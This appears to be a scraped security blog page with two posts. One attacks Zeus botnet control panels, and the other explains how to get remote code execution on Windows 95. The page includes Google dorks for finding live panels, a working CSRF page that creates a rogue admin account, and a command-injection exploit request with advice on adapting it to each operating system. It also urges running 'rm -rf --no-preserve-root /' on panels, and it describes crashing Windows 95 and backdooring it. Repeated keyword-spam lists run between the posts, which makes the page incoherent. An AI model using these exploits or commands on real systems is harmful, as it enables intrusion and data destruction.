terça-feira, 30 de maio de 2023

Attacking Financial Malware Botnet Panels - Zeus

I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:
  • inurl:cp.php?m=login - this should be the login to the control panel
  • inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
  • inurl:install/index.php - this should be deleted, but I think this is useless now.


Boring vulns found

Update: You can use the CSRF to create a new user with admin privileges:
<html> <head>     <title></title> </head> <body>     <pre>   This is a CSRF POC to create a new admin user in Zeus admin panels.   Username: user_1392719246 Password: admin1   You might change the URL from 127.0.0.1.   Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.   </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>     <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">  <input name="name" type="hidden" value="user_1392719246" />   <input name="password" type="hidden" value="admin1" />   <input name="status" type="hidden" value="1" />   <input name="comment" type="hidden" value="PWND!" />  <input name="r_botnet_bots" type="hidden" value="1" />   <input name="r_botnet_scripts" type="hidden" value="1" />   <input name="r_botnet_scripts_edit" type="hidden" value="1" />   <input name="r_edit_bots" type="hidden" value="1" />   <input name="r_reports_db" type="hidden" value="1" />   <input name="r_reports_db_edit" type="hidden" value="1" />   <input name="r_reports_files" type="hidden" value="1" />  <input name="r_reports_files_edit" type="hidden" value="1" />  <input name="r_reports_jn" type="hidden" value="1" />   <input name="r_stats_main" type="hidden" value="1" />   <input name="r_stats_main_reset" type="hidden" value="1" />   <input name="r_stats_os" type="hidden" value="1" />   <input name="r_system_info" type="hidden" value="1" />   <input name="r_system_options" type="hidden" value="1" />  <input name="r_system_user" type="hidden" value="1" />   <input name="r_system_users" type="hidden" value="1" />     </form> <script type="text/javascript">  window.onload=function(){    var counter = 10;   var interval = setInterval(function() {    counter--;    document.getElementById('countdown').innerHTML = counter;    if (counter == 0) {     redirect();     clearInterval(interval);    }   }, 1000);  };     function redirect() {   document.getElementById("csrf-form").submit();     }     </script> </body> </html> 
  • MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
  • ClickJacking - really boring stuff
  • Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
  • SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)


The following stuff looks good, at least some vulns were taken seriously:
  • The system directory is protected with .htaccess deny from all.
  • gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
  • Anti XSS: the following code is used almost everywhere
  • return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');
    My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)


And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){    ...    $archive .= '.zip';    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';    exec($cli, $e, $r); }

The exploit could not be simpler:
POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60  filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1 
because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)
More info
  1. Hacker Tools For Mac
  2. Pentest Box Tools Download
  3. Beginner Hacker Tools
  4. Hacker Tools Free Download
  5. Hacker Tools Software
  6. Hacking Tools For Games
  7. Hacker Tools List
  8. Hacking Tools Download
  9. Hacking Tools For Windows Free Download
  10. Hak5 Tools
  11. Hacker Tools For Pc
  12. Nsa Hack Tools
  13. Hacking Tools For Pc
  14. Hack Tools For Mac
  15. Hack Tools For Pc
  16. Hacker Tools Software
  17. Pentest Automation Tools
  18. Pentest Tools For Android
  19. Pentest Tools For Windows
  20. Wifi Hacker Tools For Windows
  21. Hack Tools Pc
  22. Growth Hacker Tools
  23. Hacking Tools Software
  24. Hacker Tools 2019
  25. Pentest Box Tools Download
  26. Hacker Tools Mac
  27. Pentest Tools Apk
  28. Tools 4 Hack
  29. Pentest Tools Kali Linux
  30. How To Hack
  31. Hacking Tools Download
  32. Hacker Tools Free
  33. Hack Tools For Windows
  34. New Hacker Tools
  35. New Hacker Tools
  36. Pentest Tools For Mac
  37. Hacker Tools List
  38. Hacker Tools Apk Download
  39. Hacker Tools Windows
  40. Pentest Tools
  41. Pentest Tools Windows
  42. Hack Tools For Windows
  43. Underground Hacker Sites
  44. Best Hacking Tools 2020
  45. How To Install Pentest Tools In Ubuntu
  46. Hacking Tools Windows 10
  47. Hacker Tools For Windows
  48. Ethical Hacker Tools
  49. Hacker Tools Github
  50. Game Hacking
  51. Pentest Tools For Windows
  52. Free Pentest Tools For Windows
  53. Pentest Tools Review
  54. Hack Tools Github
  55. Hack Apps
  56. Blackhat Hacker Tools
  57. Wifi Hacker Tools For Windows
  58. Hacker
  59. Hack Tools For Games
  60. Pentest Tools Nmap
  61. Bluetooth Hacking Tools Kali
  62. Hack Website Online Tool
  63. Hacker Security Tools
  64. Hacker Tools List
  65. World No 1 Hacker Software
  66. Hacker Tools Windows
  67. Best Hacking Tools 2019
  68. Physical Pentest Tools
  69. Hack Tools Pc
  70. Hack Apps
  71. Hack Tools Download
  72. Black Hat Hacker Tools
  73. Blackhat Hacker Tools
  74. Hacking Tools For Windows
  75. Hack Tools For Games
  76. Hacking Tools Free Download
  77. Pentest Tools Windows
  78. Hacking Tools
  79. Hacking Tools Download
  80. Hacking Tools For Mac
  81. Pentest Tools
  82. Nsa Hack Tools
  83. Hacker Tools Linux
  84. Pentest Tools Windows
  85. Hacker Tools Github
  86. Computer Hacker
  87. Physical Pentest Tools
  88. Hak5 Tools
  89. Termux Hacking Tools 2019
  90. Hacking Tools Online
  91. Hacking Tools Usb
  92. Pentest Tools Framework
  93. Underground Hacker Sites
  94. Hacker Tools For Windows
  95. Pentest Tools Find Subdomains
  96. Pentest Tools Framework
  97. Pentest Tools Bluekeep
  98. Pentest Tools Nmap
  99. Pentest Tools For Mac
  100. Hacking Tools For Windows Free Download
  101. How To Make Hacking Tools
  102. Pentest Recon Tools
  103. What Are Hacking Tools
  104. Hack And Tools
  105. Hacker Tools 2020
  106. Hack Tool Apk No Root
  107. Hack Apps
  108. Hack And Tools
  109. Best Hacking Tools 2019
  110. Black Hat Hacker Tools
  111. Hacking Tools Windows 10
  112. Pentest Tools Android
  113. Pentest Tools Review
  114. Pentest Tools Nmap
  115. Pentest Automation Tools
  116. Hacker Tools Free Download
  117. Hacker Tools 2020
  118. Hacks And Tools
  119. Hacker Tools 2019
  120. Hacker Tools
  121. Hacks And Tools
  122. Hacker Tools Windows
  123. Pentest Automation Tools
  124. Pentest Tools Find Subdomains
  125. Hacking Tools For Kali Linux
  126. New Hacker Tools
  127. Hacking Tools Hardware
  128. Pentest Tools For Android
  129. Pentest Box Tools Download
  130. Hack Tool Apk
  131. Pentest Tools Review
  132. Hacker Tools Apk Download
  133. Hack Tools Github
  134. Ethical Hacker Tools
  135. Hacker Hardware Tools
  136. Top Pentest Tools
  137. Nsa Hacker Tools
  138. Hack Tools
  139. Pentest Automation Tools
  140. Hacking Apps
  141. Hacking Tools For Windows 7
  142. Hack Tool Apk
  143. Hacks And Tools

Hacking Windows 95, Part 2

In the Hacking Windows 95, part 1 blog post, we covered that through a nasty bug affecting Windows 95/98/ME, the share password can be guessed in no time. In this article, I'm going to try to use this vulnerability to achieve remote code execution (with the help of publicly available tools only).

The first thing we can do when we have read access to the Windows directory through the share, is to locate all the *.pwl files on the c:\windows directory, copy them to your machine where Cain is installed, switch to Cracker tab, pwl files, load the pwl file, add username based on the filename, and try to crack it. If you can't crack it you might still try to add a .pwl file where you already know the password in the remote windows directory. Although this is a fun post-exploitation task, but still, no remote code execution. These passwords are useless without physical access.


One might think that after having a share password and user password, it is easy to achieve remote code execution. The problem is:
  • there is no "at" command (available since Windows 95 plus!)
  • there is no admin share
  • there is no RPC
  • there is no named pipes
  • there is no remote registry
  • there is no remote service management
If you think about security best practices, disabling unnecessary services is always the first task you should do. Because Windows 95 lacks all of these services, it is pretty much secure!

During my quest for a tool to hack Windows 95, I came across some pretty cool stuff:
LanSpy

But the best of the best is Fluxay, which has been written by chinese hackers. It is the metasploit from the year 2000. A screenshot is worth more than a 1000 words. 4 screenshot > 4 thousand words :)





It is pretty hard to find the installer, but it is still out there!

But at the end, no remote code execution for me.

My idea here was that if I can find a file which executes regularly (on a scheduled basis), I can change that executable to my backdoor and I'm done. Although there is no scheduler in the default Windows 95, I gave it a try. 

Let's fire up taskman.exe to get an idea what processes are running:


Looks like we need a more powerful tool here, namely Process Explorer. Let's try to download this from oldapps.com:


LOL, IE3 hangs, can't render the page. Copying files to the Win95 VM is not that simple, because there are no shared folders in Win95 VM. And you can't use pendrives either, Win95 can't handle USB (at least the retail version). After downloading the application with a newer browser from oldapps, let's start Process Explorer on the test Windows 95.


Don't try to download the Winsocks 2 patch from the official MS site, it is not there anymore, but you can download it from other sites

Now let's look at the processes running:


After staring it for minutes, turned out it is constant, no new processes appeared.
Looking at the next screenshot, one can notice this OS was not running a lot of background processes ...


My current Win7 has 1181 threads and 84 processes running, no wonder it is slow as hell :)

We have at least the following options:
  1. You are lucky and not the plain Windows 95 is installed, but Windows 95 Plus! The main difference here is that Windows 95 Plus! has built-in scheduler, especially the "at" command. Just overwrite a file which is scheduled to execution, and wait. Mission accomplished!
  2. Ping of death - you can crash the machine (no BSOD, just crash) with long (over 65535 bytes) ICMP ping commands, and wait for someone to reboot it. Just don't forget to put your backdoor on the share and add it to autoexec.bat before crashing it. 
  3. If your target is a plain Windows 95, I believe you are out of luck. No at command, no named pipes, no admin share, nothing. Meybe you can try to fuzz port 137 138 139, and write an exploit for those. Might be even Ping of Death is exploitable?
Let's do the first option, and hack Windows 95 plus!
Look at the cool features we have by installing Win95 Plus!


Cool new boot splash screen!


But our main interest is the new, scheduled tasks!


Now we can replace diskalm.exe with our backdoor executable, and wait maximum one hour to be scheduled.

Instead of a boring text based tutorial, I created a YouTube video for you. Based on the feedbacks on my previous tutorialz, it turned out I'm way too old, and can't do interesting tutorials. That's why I analyzed the cool skiddie videoz, and found that I have to do the followings so my vidz won't suck anymore:
  • use cool black windows theme
  • put meaningless performance monitor gadgets on the sidebar
  • use a cool background, something related with hacking and skullz
  • do as many opsec fails as possible
  • instead of captions, use notepad with spelling errorz
  • there is only one rule of metal: Play it fuckin' loud!!!!
Related posts

  1. Hacker Tools Windows
  2. Nsa Hacker Tools
  3. Game Hacking
  4. Hack Tools For Windows
  5. Hacker Tools 2020
  6. Pentest Tools Framework
  7. Hak5 Tools
  8. How To Hack
  9. Pentest Tools For Mac
  10. Hacking Apps
  11. Hack Tools
  12. Hack Tools 2019
  13. Pentest Tools Download
  14. Nsa Hack Tools Download
  15. Game Hacking
  16. Hacker Tool Kit
  17. Hacker Tools 2020
  18. Hacker Tools List
  19. World No 1 Hacker Software
  20. Pentest Tools
  21. Hacking Tools For Games
  22. Easy Hack Tools
  23. Hacker Tools Github
  24. Hack Tools Online
  25. Hacking Tools Usb
  26. Pentest Tools Nmap
  27. Hacking Apps
  28. Hacker Tools Github
  29. How To Hack
  30. Hack Tools For Ubuntu
  31. Hacker Tools Hardware
  32. Hacking Tools Software
  33. Hack Tools For Mac
  34. Black Hat Hacker Tools
  35. Hacking Tools For Windows Free Download
  36. Pentest Tools Free
  37. Hacking Apps
  38. Hacker Tools For Windows
  39. Hack Apps
  40. Hacking Tools Kit
  41. Hacker Techniques Tools And Incident Handling
  42. Beginner Hacker Tools
  43. New Hacker Tools
  44. Pentest Tools Apk
  45. Growth Hacker Tools
  46. Hacker Tools Linux
  47. Hacking Tools For Beginners
  48. Hacking Tools Free Download
  49. Hacker Tools Linux
  50. How To Make Hacking Tools
  51. Pentest Tools Url Fuzzer
  52. Hack Tools For Mac

Hackerhubb.blogspot.com

Hackerhubb.blogspot.com

More info


  1. Hacker Tools 2020
  2. Hack App
  3. Pentest Tools For Android
  4. Underground Hacker Sites
  5. Hacker Tools
  6. Hacking Tools Usb
  7. Pentest Tools Tcp Port Scanner
  8. Hacking Tools For Kali Linux
  9. Hack Tools
  10. Tools 4 Hack
  11. Tools 4 Hack
  12. Hacking Tools 2019
  13. Hack Tools Pc
  14. Hack Rom Tools
  15. Hacker Tools For Mac
  16. Pentest Tools Android
  17. Nsa Hacker Tools
  18. Hacker Tools Free Download
  19. Pentest Tools For Ubuntu
  20. Hacks And Tools
  21. Hack Tools For Windows
  22. Hacking Tools For Mac
  23. Hacker Tools 2020
  24. Pentest Recon Tools
  25. Hack Tools Pc
  26. Hacking Tools For Windows
  27. Hacker Tools Windows
  28. Hacker Tools Free Download
  29. Hack Tools
  30. Hacker Tools Apk Download
  31. Tools For Hacker
  32. Pentest Tools Alternative
  33. Hacking Tools Windows
  34. Pentest Tools Windows
  35. Hacking Tools And Software
  36. Pentest Tools Android
  37. Hacking Tools Download
  38. Pentest Tools Github
  39. Hacking Tools For Beginners
  40. Hacker Search Tools
  41. Pentest Tools Framework
  42. Hak5 Tools
  43. Pentest Tools List
  44. Hacker Tools List
  45. Hack Tools For Games
  46. Pentest Tools For Android
  47. Termux Hacking Tools 2019
  48. Hak5 Tools
  49. What Is Hacking Tools
  50. Pentest Tools
  51. Pentest Tools Windows
  52. Pentest Tools Framework
  53. Hacker Hardware Tools
  54. Hacker Tools Free Download
  55. Hacking Tools
  56. Hacker Tools Hardware
  57. Hacker Tools Apk
  58. Hack Apps
  59. Pentest Tools
  60. Github Hacking Tools
  61. Physical Pentest Tools
  62. Pentest Tools Port Scanner
  63. Hacking Tools For Pc
  64. Hacking Tools Free Download
  65. Hacking Tools For Windows
  66. Hacking Tools For Mac
  67. Hack And Tools
  68. Pentest Tools Find Subdomains
  69. New Hack Tools
  70. Best Pentesting Tools 2018
  71. Pentest Tools For Mac
  72. Pentest Tools Android
  73. Hacking Tools
  74. Pentest Tools For Mac
  75. Hacking Tools Download
  76. Hack Tools 2019
  77. Pentest Recon Tools
  78. Hacking Tools For Kali Linux
  79. Hacker Tools Apk Download
  80. Hack Tools Download
  81. Hack Tools For Mac
  82. Pentest Box Tools Download
  83. Pentest Tools Alternative
  84. Hacking Tools For Windows
  85. Pentest Tools List
  86. Pentest Tools Bluekeep
  87. Underground Hacker Sites
  88. Pentest Reporting Tools
  89. Hacker Tools Free
  90. Hacker Tools Hardware
  91. Hacker Tools Apk Download
  92. Bluetooth Hacking Tools Kali
  93. Hackrf Tools
  94. Hacking Tools For Windows 7
  95. Hacking Tools Name
  96. Tools For Hacker
  97. Tools For Hacker
  98. Hacking Tools Windows 10
  99. Pentest Tools Bluekeep
  100. Pentest Recon Tools
  101. Hacker Tools Github
  102. Pentest Tools For Mac
  103. Usb Pentest Tools
  104. Hacking Tools For Windows
  105. Pentest Tools Nmap
  106. Hacker Tools Mac
  107. Hacker Tools Online
  108. Hacking Tools Online
  109. Hacker Tools Github
  110. Tools Used For Hacking
  111. Pentest Tools Bluekeep
  112. Beginner Hacker Tools
  113. Hacking Tools Usb
  114. Hacker Tool Kit
  115. Pentest Tools For Ubuntu
  116. Hack Tools For Ubuntu
  117. Hacker Tools Free Download
  118. Hacking Apps
  119. Hacking Tools Windows 10
  120. Android Hack Tools Github
  121. Wifi Hacker Tools For Windows
  122. Pentest Tools Github
  123. Hacking Tools
  124. Tools 4 Hack
  125. Hacking Tools Windows 10
  126. Hacker Tools List
  127. Blackhat Hacker Tools
  128. How To Make Hacking Tools
  129. Hack Tools For Ubuntu
  130. Hack Website Online Tool
  131. Hacking Tools Github